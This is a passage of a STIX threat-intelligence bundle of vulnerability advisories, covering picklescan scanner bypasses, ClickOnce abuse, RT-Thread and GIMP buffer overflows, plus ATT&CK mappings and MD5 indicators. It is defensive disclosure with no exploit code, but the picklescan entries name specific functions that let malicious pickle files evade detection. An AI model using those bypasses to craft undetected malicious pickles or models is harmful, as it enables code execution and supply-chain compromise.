      "description": "## Overview\n\nCVE-2025-71343 describes a critical vulnerability affecting `picklescan` versions prior to 0.0.30. This flaw stems from a detection bypass related to the `lib2to3.pgen2.pgen.ParserGenerator.make_label` function within the `reduce` method, which is a key component in parsing Python bytecode. Attackers can leverage this vulnerability to craft highly sophisticated malicious pickle files. These files are specifically designed to contain embedded arbitrary commands but will successfully evade `picklescan`'s security checks. When an application on a vulnerable system then uses the standard `pickle.load()` function to deserialize one of these malicious files, the embedded commands are executed, resulting in arbitrary code execution. This poses a significant risk to systems that process untrusted pickle files, as the primary defense mechanism (`picklescan`) is rendered ineffective against this specific evasion technique.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious Python pickle file containing arbitrary code, specifically exploiting the `lib2to3.pgen2.pgen.ParserGenerator.make_label` function's `reduce` method to bypass `picklescan`'s detection.\n2.  The malicious pickle file is delivered to a target system, potentially through methods such as email attachments, malicious web downloads, or integration into a compromised software supply chain.\n3.  An application or user on the target system processes or scans the received pickle file using `picklescan` version prior to 0.0.30.\n4.  Due to CVE-2025-71343, `picklescan` fails to identify the embedded malicious payload, incorrectly marking the file as benign.\n5.  A Python application or script on the target system subsequently loads the \"undetected\" malicious pickle file using `pickle.load()`.\n6.  During the deserialization process, the embedded arbitrary code within the pickle file is executed in the context of the Python application.\n7.  The attacker achieves arbitrary command execution on the compromised system, potentially leading to full system compromise, data exfiltration, or further lateral movement.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71343 allows an attacker to achieve arbitrary code execution on systems that process untrusted pickle files using vulnerable versions of `picklescan`. This can lead to complete system compromise, unauthorized access to sensitive data, installation of malware, or disruption of services. While no specific victim counts are provided, any organization or individual processing Python pickle files in environments where `picklescan` is used for security vetting (especially in data science, machine learning, or software development contexts) is at risk. The undetected nature of the attack makes it particularly dangerous, as security tools designed to prevent such threats are bypassed.\n\n## Recommendation\n\n*   Update `picklescan` to version 0.0.30 or later immediately to patch CVE-2025-71343 and address the detection bypass vulnerability.\n*   Implement strict controls on the ingestion and processing of untrusted pickle files, regardless of `picklescan`'s output, especially from external or unverified sources.\n*   Educate users and developers about the risks associated with deserializing untrusted data, specifically in the context of Python pickle files, to prevent arbitrary code execution (CWE-502).\n",
      "published": "2026-07-04T02:19:30Z",
      "labels": [
        "deserialization",
        "remote-code-execution",
        "python",
        "vulnerability",
        "detection-bypass"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71343"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-p9w7-82w4-7q8m"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-lib2to3-pgen2-pgen-parsergenerator-make-label-detection-bypass"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12f4bff4-d94d-5fce-a7ad-ec6335ed405b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d643d81d-8b05-59ff-971b-6cc84d52d3ea",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d643d81d-8b05-59ff-971b-6cc84d52d3ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71342: picklescan Remote Code Execution Vulnerability",
      "description": "## Overview\n\nCVE-2025-71342 identifies a significant vulnerability within `picklescan` versions prior to 0.0.30, a Python library designed to scan pickle files for malicious content. The flaw stems from `picklescan`'s inability to adequately detect embedded malicious code when attackers specifically use `idlelib.run.Executive.runcode` within the reduce methods of a Python pickle file. This oversight allows threat actors to craft seemingly benign pickle files that, upon deserialization using `pickle.load`, will execute arbitrary code. The vulnerability poses a severe risk, particularly for environments handling untrusted pickle files, such as those involving machine learning models (e.g., PyTorch models). Successful exploitation can lead to remote code execution (RCE) on the target system and facilitate widespread supply chain attacks by injecting malicious logic into widely distributed models or data.\n\n## Attack Chain\n\n1.  An attacker crafts a specially designed Python pickle file containing arbitrary code.\n2.  The malicious code is embedded within the pickle file's reduce methods, specifically leveraging `idlelib.run.Executive.runcode` to obscure its true intent.\n3.  The attacker then distributes this malicious pickle file, potentially by injecting it into a software supply chain (e.g., a shared machine learning model repository).\n4.  A victim system or application, such as a PyTorch model loader, downloads or receives the compromised pickle file.\n5.  The application attempts to deserialize the pickle file using Python's `pickle.load()` function.\n6.  During the deserialization process, `picklescan` (if present and vulnerable, i.e., version \u003c 0.0.30) fails to identify the `idlelib.run.Executive.runcode` as a malicious primitive.\n7.  The embedded arbitrary code within the pickle file's reduce methods is consequently executed by the Python interpreter on the victim's system.\n8.  This results in remote code execution (RCE), allowing the attacker to compromise the host system and potentially exfiltrate data or establish persistence.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71342 carries severe consequences, primarily remote code execution (RCE) with a CVSS v3.1 base score of 8.1 (High severity). This vulnerability can lead to complete compromise of the affected system's confidentiality and integrity, as attackers gain the ability to execute arbitrary commands. The primary risk lies in supply chain attacks, where malicious pickle files can be distributed through legitimate channels, infecting numerous downstream users. PyTorch models, often distributed as pickle files, are particularly vulnerable, meaning that compromised models could propagate malware to researchers, developers, and production systems globally, leading to widespread data theft, system sabotage, or further network penetration.\n\n## Recommendation\n\n*   Immediately update `picklescan` to version 0.0.30 or later to remediate CVE-2025-71342.\n*   Implement strict validation and sandboxing for deserialization of Python pickle files, especially those from untrusted or external sources.\n*   Educate development teams on the risks associated with deserializing untrusted data, specifically in the context of CVE-2025-71342 and `pickle.load`.\n*   Review existing practices for handling and loading machine learning models (e.g., PyTorch models) to ensure only verified and scanned pickle files are processed.\n",
      "published": "2026-07-04T02:18:42Z",
      "labels": [
        "vulnerability",
        "rce",
        "supply-chain",
        "python",
        "pickle",
        "pytorch"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71342"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m869-42cg-3xwr"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-undetected-remote-code-execution-via-idlelib-run-executive-runcode"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e075dd8-7079-51f1-be10-edefcccacc67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4845dffd-1634-588c-a69e-9bfd4b319c35",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4845dffd-1634-588c-a69e-9bfd4b319c35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology: Understanding Deployment Mechanics for Future Detection",
      "description": "## Overview\n\nThis brief details the inherent abuse potential within Microsoft's ClickOnce technology, a legitimate application deployment framework designed for simplified software distribution and updates. While intended to ease user installation and developer distribution, ClickOnce's features—such as minimal user interaction and lack of administrative privilege requirements for deployment—make it an attractive vector for threat actors. CrowdStrike's research, published on June 18, 2026, analyzes the inner workings of ClickOnce, highlighting how its design allows for self-contained and self-updating applications to be installed with a single click, providing a low-friction method for adversaries to deliver malware. This Part 1 of a two-part series focuses on the technical mechanisms of ClickOnce deployment, laying the groundwork for understanding its weaponization and future detection strategies.\n\n## Attack Chain\n\n(No specific attack chain is described in this Part 1; it focuses on the technology's mechanics and abuse potential rather than observed exploitation.)\n\n## Impact\n\nIf successfully abused, ClickOnce technology can significantly lower the barrier for entry for threat actors distributing malware. Its design allows for applications to be deployed and installed on user systems with minimal interaction, often bypassing the need for administrative privileges. This effectively tricks users into executing malicious code disguised as legitimate software, leading to potential system compromise, data exfiltration, or further infection. The self-updating nature of ClickOnce applications could also allow attackers to maintain persistence and evolve their payloads without further user interaction, making detection and remediation challenging. The ease of deployment across various environments makes it a potent tool for widespread malware campaigns targeting any Windows user.\n\n## Recommendation\n\n*   Familiarize detection engineering teams with the architectural details of Microsoft ClickOnce technology, as outlined in this brief, to better understand potential vectors for malware distribution.\n*   Anticipate future detection briefs and advisories detailing specific malicious ClickOnce application behaviors, particularly those expected in Part 2 of CrowdStrike's research on this topic.\n",
      "published": "2026-07-04T01:27:09Z",
      "labels": [
        "clickonce",
        "malware",
        "windows",
        "application-deployment",
        "abuse"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--05bd3d79-2267-5c9a-8e7b-6e29a0b93910",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14606 — Stack-Based Buffer Overflow in RT-Thread CAN_Receive",
      "description": "## Overview\n\nA critical security flaw, identified as CVE-2026-14606, has been discovered within versions of RT-Thread up to and including 5.0.2. This vulnerability specifically impacts the `CAN_Receive` function, located in the `bsp/synwit/libraries/SWM341_CSL/CMSIS/DeviceSupport/SWM341.h` library, which is part of the SWM341 CAN Handler component. Attackers can trigger a stack-based buffer overflow by performing a specific manipulation, which requires local access to the affected device. While local access is a prerequisite, the exploit code has been publicly released, significantly lowering the bar for malicious actors to leverage this flaw. The vendor, RT-Thread, was reportedly notified prior to public disclosure but has not yet provided a response or patch. This vulnerability is significant for organizations using RT-Thread in embedded systems, particularly in IoT and industrial control environments, as successful exploitation could lead to arbitrary code execution or denial of service.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14606 would result in a stack-based buffer overflow, potentially leading to arbitrary code execution or a denial of service on affected RT-Thread devices. Given that the vulnerability requires local access, the primary risk lies in scenarios where an attacker has already compromised the device through other means or has physical access. The public availability of exploit code increases the likelihood of widespread exploitation once initial access is gained. Organizations utilizing RT-Thread in critical infrastructure, IoT deployments, or embedded systems could face severe operational disruptions, data compromise, or loss of device integrity if these systems are compromised. The lack of a vendor response further exacerbates the risk, leaving users without an official patch.\n\n## Recommendation\n\n* Patch CVE-2026-14606 immediately once a vendor-supplied update for RT-Thread \u003c= 5.0.2 becomes available.\n* Review and restrict local access privileges to devices running affected RT-Thread versions to mitigate the risk of local exploitation of CVE-2026-14606.\n* Implement strong access controls and physical security measures for devices where local access could lead to compromise via CVE-2026-14606.\n* Continuously monitor for any unauthorized process execution or system instability on RT-Thread devices that might indicate exploitation of CVE-2026-14606.\n",
      "published": "2026-07-03T20:24:37Z",
      "labels": [
        "vulnerability",
        "buffer-overflow",
        "RT-Thread",
        "IoT",
        "ICS",
        "embedded-systems"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14606"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb4aec3b-6818-5eb7-a473-0d815876c929",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--93251621-4c3e-50f9-8e86-ebd8047a67d4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--93251621-4c3e-50f9-8e86-ebd8047a67d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14605: RT-Thread Stack-based Buffer Overflow",
      "description": "## Overview\n\nA critical stack-based buffer overflow vulnerability, identified as CVE-2026-14605, has been discovered in RT-Thread, an open-source real-time operating system, affecting versions up to 5.0.2. The flaw resides specifically within the `recvmsg` function in the `bsp/loongson/ls1cdev/libraries/ls1c_can.h` library, part of the `ls1c CAN Handler` component. Exploitation of this vulnerability necessitates local access to the affected system, meaning an attacker must already have a foothold on the device. A public exploit for this vulnerability is available, increasing the likelihood of its use by malicious actors. The vendor, RT-Thread, was contacted regarding this disclosure but has not provided a response, leaving affected systems at risk. This vulnerability poses a significant threat to the confidentiality, integrity, and availability of systems utilizing affected RT-Thread versions.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14605, a stack-based buffer overflow, could lead to a complete compromise of the affected RT-Thread system. With high impact on confidentiality, integrity, and availability (CVSS 3.1 Base Score 7.8), attackers could potentially execute arbitrary code with elevated privileges, gain full control over the embedded device, or cause system instability and denial of service. Since RT-Thread is commonly used in embedded systems and IoT devices, successful exploitation could have severe consequences ranging from data exfiltration and intellectual property theft to physical disruption of critical infrastructure or industrial control systems.\n\n## Recommendation\n\n*   Immediately patch or update RT-Thread installations to a version beyond 5.0.2 to remediate CVE-2026-14605.\n*   Restrict local access to all devices running affected RT-Thread versions as exploitation of CVE-2026-14605 requires local access.\n*   Monitor for any unusual activity or process behavior on devices running RT-Thread, especially after any local access event, given the public availability of an exploit for CVE-2026-14605.\n",
      "published": "2026-07-03T20:23:58Z",
      "labels": [
        "rt-thread",
        "buffer-overflow",
        "cve",
        "local-exploitation",
        "embedded-systems"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14605"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/RT-Thread/rt-thread/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/RT-Thread/rt-thread/issues/11424"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14605"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/844580"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376113"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376113/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--377fc406-e2fa-57dd-b0bf-8f9fc0c2d2c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9b78af76-f7f8-5303-8f14-aed83ebe1f4a",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3040d05c-d1ec-5afd-b204-e37757df7c56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9b78af76-f7f8-5303-8f14-aed83ebe1f4a",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8edcf213-0e24-5725-87cd-51478b094b3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9b78af76-f7f8-5303-8f14-aed83ebe1f4a",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9b78af76-f7f8-5303-8f14-aed83ebe1f4a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58379: GIMP Heap Buffer Overflow in PSP Parser Allows RCE",
      "description": "## Overview\n\nA critical heap buffer overflow vulnerability, identified as CVE-2026-58379, has been discovered in GIMP's Paint Shop Pro (PSP) file format parser. This flaw allows a remote attacker to achieve arbitrary code execution or a denial of service (DoS) on affected systems. The vulnerability is triggered when a user is tricked into opening a specially crafted PSP image file. The core issue lies in the software's incorrect calculation of buffer sizes when processing low bit-depth images, leading to an overwrite of adjacent memory. This affects the GIMP application, particularly the `gimp` package on Red Hat Enterprise Linux 9, as confirmed by Red Hat. Defenders should prioritize patching GIMP to mitigate the risk of successful exploitation, which could lead to complete system compromise or disruption.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Paint Shop Pro (PSP) image file specifically designed to exploit CVE-2026-58379, incorporating malformed low bit-depth image data.\n2.  The attacker delivers the specially crafted PSP file to a target user, often via social engineering tactics such as email attachments or malicious download links.\n3.  The unsuspecting user is tricked into opening the malicious PSP image file using the GIMP application on their system.\n4.  GIMP's internal PSP file format parser attempts to process the malformed image data within the file.\n5.  During the parsing of low bit-depth image data, GIMP incorrectly calculates buffer sizes for memory allocation, leading to a heap buffer overflow condition.\n6.  This overflow allows attacker-controlled data to overwrite adjacent memory regions within the GIMP process.\n7.  Successful exploitation of the memory corruption leads to either arbitrary code execution within the context of the GIMP process or a denial of service, crashing the application.\n8.  With arbitrary code execution, the attacker can establish persistence, exfiltrate data, or further compromise the compromised system.\n\n## Impact\n\nThe successful exploitation of CVE-2026-58379 can lead to significant consequences, ranging from a denial of service (DoS) that crashes the GIMP application, disrupting user workflow, to arbitrary code execution. Arbitrary code execution would allow an attacker to run malicious code within the context of the affected user, potentially leading to full system compromise, data exfiltration, or the installation of additional malware. While specific victim counts or targeted sectors are not detailed, any user of the vulnerable GIMP version, particularly on Red Hat Enterprise Linux 9, is at risk.\n\n## Recommendation\n\n*   Immediately update GIMP to a patched version that addresses CVE-2026-58379. Consult Red Hat advisories (e.g., https://access.redhat.com/security/cve/CVE-2026-58379) for specific package updates for Red Hat Enterprise Linux 9.\n*   Educate users about the risks of opening unsolicited or suspicious image files, especially those from untrusted sources, to mitigate the initial access vector associated with opening specially crafted PSP files.\n",
      "published": "2026-07-03T19:18:57Z",
      "labels": [
        "heap-buffer-overflow",
        "vulnerability",
        "image-processing",
        "gimp"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58379"
        },
        {
          "source_name": "reference",
          "url": "https://access.redhat.com/security/cve/CVE-2026-58379"
        },
        {
          "source_name": "reference",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2495997"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/b630f167"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/16205"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2e138659-726d-5791-85b9-adab26689a12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 08a2405cd32f044a69737e77454ee2da",
      "pattern": "[file:hashes.MD5 = '08a2405cd32f044a69737e77454ee2da']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33987124-a290-51df-8b7b-2470a5107f43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--2e138659-726d-5791-85b9-adab26689a12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2751bb83-88a1-5e8b-b3de-af2688902df7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 0d68a310f4265821900249bec89364c2",
      "pattern": "[file:hashes.MD5 = '0d68a310f4265821900249bec89364c2']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe8f6bc7-23af-5252-81f3-f7130b369da0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--2751bb83-88a1-5e8b-b3de-af2688902df7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--29cdef56-d7d1-5686-98d5-038079777afd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 11d795baafa44b73766e850d13b8e254",
      "pattern": "[file:hashes.MD5 = '11d795baafa44b73766e850d13b8e254']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c1fc42d-12e9-5834-ad03-d455944e70b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--29cdef56-d7d1-5686-98d5-038079777afd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3aa9a81d-f663-5a5a-93ca-bf91c8eb9822",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 144183a4217ae0914ba0c865858d07cd",
      "pattern": "[file:hashes.MD5 = '144183a4217ae0914ba0c865858d07cd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61a2ba02-f191-5cb7-b7ef-1f0859868423",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--3aa9a81d-f663-5a5a-93ca-bf91c8eb9822"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--deb70478-f06f-5143-ade0-4209332787a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 19ff6488a259d750ec18902fe75a713b",
      "pattern": "[file:hashes.MD5 = '19ff6488a259d750ec18902fe75a713b']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ff4b017-fc9a-54f1-8ff6-2d266a907aa7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--deb70478-f06f-5143-ade0-4209332787a1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f5689214-af5d-56d7-9520-df1578a0aea5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 1bde76f3197123dcc2ecd0bfef567484",
      "pattern": "[file:hashes.MD5 = '1bde76f3197123dcc2ecd0bfef567484']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--152200f3-b885-5138-8515-65ba1874d78b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--f5689214-af5d-56d7-9520-df1578a0aea5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--687d76d9-8d0e-5f1f-8e12-cf797fd6dd14",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 1c4bea81c0da22badd9b7eab574c51cd",
      "pattern": "[file:hashes.MD5 = '1c4bea81c0da22badd9b7eab574c51cd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0591a57-d61d-582e-a6ac-4bbc574d24bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--687d76d9-8d0e-5f1f-8e12-cf797fd6dd14"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5cf33e92-dd8c-57b2-9a80-7276d9704a69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 2020979e080d7ac9c0403172573c7de8",
      "pattern": "[file:hashes.MD5 = '2020979e080d7ac9c0403172573c7de8']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04459be2-c860-5062-8c50-21f5ddc6847d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--5cf33e92-dd8c-57b2-9a80-7276d9704a69"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--80d8251f-d02d-56d8-a427-56cb419a53e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 24a8fcd08d9e40d32929b57de9b15385",
      "pattern": "[file:hashes.MD5 = '24a8fcd08d9e40d32929b57de9b15385']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b98a98ad-3446-5cda-ba71-0a611244b6fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--80d8251f-d02d-56d8-a427-56cb419a53e1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--138d4ac3-bd90-5655-ba98-c34824f84920",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 2bb209ccfc5103eccab523c875050cfa",
      "pattern": "[file:hashes.MD5 = '2bb209ccfc5103eccab523c875050cfa']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eddd060e-69dd-5891-ad1d-ee8ad00f5182",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
